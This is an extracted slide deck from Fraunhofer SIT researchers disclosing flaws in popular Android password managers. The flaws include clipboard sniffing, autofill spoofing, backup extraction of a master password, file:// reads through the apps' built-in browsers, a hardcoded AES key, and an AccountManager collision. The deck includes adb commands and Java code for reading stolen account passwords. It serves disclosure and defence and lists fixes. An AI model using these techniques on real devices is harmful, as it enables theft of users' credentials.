Vulnerabilities in Android Password Manager

Vulnerabilities in Android Password Manager
Extracting All Your Secrets:
Vulnerabilities in Android
Password Managers
Stephan Huber, Siegfried Rasthofer, Steven Arzt
Fraunhofer SIT
Stephan
Siegfried
• Mobile Security Researcher at
Fraunhofer SIT
• Malware and Vulnerability
Researcher at Fraunhofer SIT
• Founder of CodeInspect
• Enjoys teaching students in
Android (app) hacking
• Web: www.rasthofer.info
• Twitter: @teamsik
• Twitter: @teamsik
2
Acknowledgements
• Benedikt Hiemenz
• Daniel Hitzel
• Daniel Magin
• Joseph Varghese
• Julien Hachenberger
• Max Kolhagen
• Michael Tröger
• Philipp Roskosch
• Wittmann Andreas
3
90 Accounts*
*https://thycotic.com
Public Key Crypto
Notebook
Biometric
Pictures
Password Manager
...
Password Manager
Source: https://www.getkeepsafe.com/about.html
7
App
GooglePlay Downloads
Keeper
10 – 50 m
Keepsafe
10 – 50 m
1Password
1–5m
Dashlane
1–5m
Lastpass
1–5m
Avast
0.5 – 1 m
MyPasswords
0.5 – 1 m
F-Secure
100 – 500 k
PasswordManger
50 – 100 k
8
Secure
Synchronization
Confidential
Password Storage
Autofill
Password Manager
Comfort Feature
(PIN login)
Custom Browser
9
Internet
App
PW-Manager App
PC
File
(master password)
user1:pw1
user2:pw2
...
Database
Account Manager
(master password)
10
“No-root scenario“
Internet
App
PW-Manager App
PC
File
(master password)
user1:pw1
user2:pw2
...
Database
Account Manager
(master password)
11
Internet
App
PW-Manager App
PC
File
(master password)
user1:pw1
user2:pw2
...
Database
Account Manager
(master password)
12
Manual Filling
Automatically Filling
13
Manual Filling
Password Manager
user
****
user1
****
user2
****
user3
****
http://twitter.com/login
Clipboard
14
Manual Filling - Attack
Receiver Apps
user:pass
Password Manager
user:pass
clipboard „sniffer“- app
(no permissions required)
15
Automatically Filling
Password Manager
user
****
user1
****
user2
****
user3
****
?
16
user1
****
Accessibility Services
“An accessibility service is an application that
provides user interface enhancements to
assist users with disabilities, or who may
temporarily be unable to fully interact with a
device. For example, users who are driving,
taking care of a young child or attending a
very loud party might need additional or
alternative interface feedback.“
Source: https://developer.android.com
17
Automatically Filling
Password Manager
user
****
user1
****
user2
****
user3
****
?
18
Twitter-App
(com.twitter.android)
Automatically Filling
Password Manager
Twitter-App
(com.twitter.android)
19
Automatically Filling - Attack
com.twitter.twitterleak
reverse
com.twitter
prefix
matches
find field
textPassword
inject credentials
20
DEMO
TIME
!
DEMO
21
PW-Manager App
PC
File
(master password)
user1:pw1
user2:pw2
...
Database
22
Use Backup Function
adb
adb
backup com.fsecure.key
*
tar –xvf mybackup.tar
cat KeyStorage.xml
<string name="master_password">secretpass</string>
* https://github.com/nelenkov/android-backup-extractor
23
PW-Manager App
File
(master password)
user1:pw1
user2:pw2
...
Database
24
PW Manager
API accessing browser elements
credentials
25
Pw Manager
API accessing browser elements
credentials
26
Password Manager
Custom Browser
http://twitter.com/login
user
****
user1
****
user2
****
user3
****
autofill
user1
****
27
Password Manager
Custom Browser
http://twitter.com/login
local app folder
28
Details about the Browser
• Browser is part of the app
• Running in the same process, part of the sandbox
• Based on WebView API
• Supports file:// URI *
*until Android 6
29
NOT A COOKIE,CREDENTIALS !
30
file:///data/data/package.name/shared_prefs/passwords_pref.xml
md5(„pincodeValue“) *
base64(encr(key, PIN))
*obfuscated attribute values (for this example)
31
32
Let‘s Look into the App Code
public abstract class LPCommon {
//first part of the key
protected static String aA = "ldT52Fjsnjdn4390";
//second part of the key
protected static String aB = "89y23489h989fFFF";
AES-Key: ldT52Fjsnjdn439089y23489h989fFFF
33
PW-Manager App
File
(master password)
user1:pw1
user2:pw2
...
Database
Account Manager
(master password)
34
Android AccountManger
• „This class provides access to a centralized registry
for the user‘s online accounts …“
• SQLITE Database for storing tokens or temporary
Credentials
• API provides access for Application
/data/system/users/0 # ls -l accounts.db
-rw-rw---- system
system
241664 2017-04-03 10:58 accounts.db
35
“With this in mind, you shouldn't pass the user's actual password to
AccountManager.addAccountExplicitly(). Instead, you should
store a cryptographically secure token that would be of limited use to an attacker.
If your user credentials are protecting something valuable, you should carefully
consider doing something similar.”
Quote google developer (AccountManager)
https://developer.android.com/training/id-auth/custom_auth.html
36
DEMO TIME !
37
System
AccountManager
accounts.db
38
Target App
com.dashlane
email:passwd
System
account type
AccountManager
accounts.db
39
Target App
com.dashlane
email:passwd
System
account type
AccountManager
UID:123
accounts.db
email:passwd
40
Attacker App
Target App
*
com.dashlane
email:passwd
com.dashlane
mail1:pass1
System
account type
account type
AccountManager
UID:123
accounts.db
email:passwd
*https://thenounproject.com/term/grab/121228/
41
Attacker App
Target App
com.dashlane
email:passwd
com.dashlane
mail1:pass1
System
account type
account type
AccountManager
COLLISION!
UID:123
UID:456
accounts.db
email:passwd
42
Attacker App
com.dashlane
mail1:pass1
System
account type
AccountManager
accounts.db
email:passwd
43
Attacker App
Read Account Data
com.dashlane
email:passwd
System
account type
AccountManager
UID:456
accounts.db
email:passwd
44
Writing into AccountManager
try {
Account account = new Account("[email protected] ", "com.dashlane");
AccountManager acmanager =
AccountManager.get(getApplicationContext());
//requires permission android.permission.AUTHENTICATE_ACCOUNTS
acmanager.addAccountExplicitly(account, „DUMMY", null);
} catch (Exception e) {
Log.e(TAG, "Acc Exception " + e.getMessage());
}
catch collision
Reading form AccountManager
try {
AccountManager acmgr = AccountManager.get(getApplicationContext());
Account[] accounts = acmgr.getAccountsByType("com.dashlane");
for (Account a : accounts) {
String password =
AccountManager.get(getApplicationContext()).getPassword(a);
…
} catch (Exception e) {
e.printStackTrace();
}
45
Further Fails
• Custom crypto-algorithm
• AES in ECB mode for database encryption
• Delivered browser do not consider subdomains in
form fields
• Data leakage in browser
• Custom transport security
46
Improvements
• Use Android KeyStore (since Android 6 AES key
support)
• Use key derivation function (e.g. API PBKDF2, FB
conceal)
• NO hardcoded keys
• Use AES/CBC or AES/GCM
• Do not abuse AccountManager
47
Keeper
Master/PIN
MyPass Avast F-Sec
X
X
Hardcoded
Key
X
Sandbox
Bypass
X
Side channel
Keeps. PwMgr MyPass
X
X
X
Dash
X
X
X
X
X
X
X
X
X
X
X
X
Subdomain
X
X
Data leakage
X
X
Partial
encryption
X
Lastp 1Pass
X
X
X
X
X
X
X
X
Broken sync.
X
www.sit4.me/pw-manager
48
Summary
• We showed several non root attacks on Android
password managers
• Convenience functions weaken or destroy security
• All findings were reported and fixed
49
Stephan Huber
Email: [email protected]
Dr. Siegfried Rasthofer
Email: [email protected]
Twitter: @teamsik
Website: www.team-sik.org
50
Was this manual useful for you? yes no
Thank you for your participation!

* Your assessment is very important for improving the work of artificial intelligence, which forms the content of this project

Download PDF

advertisement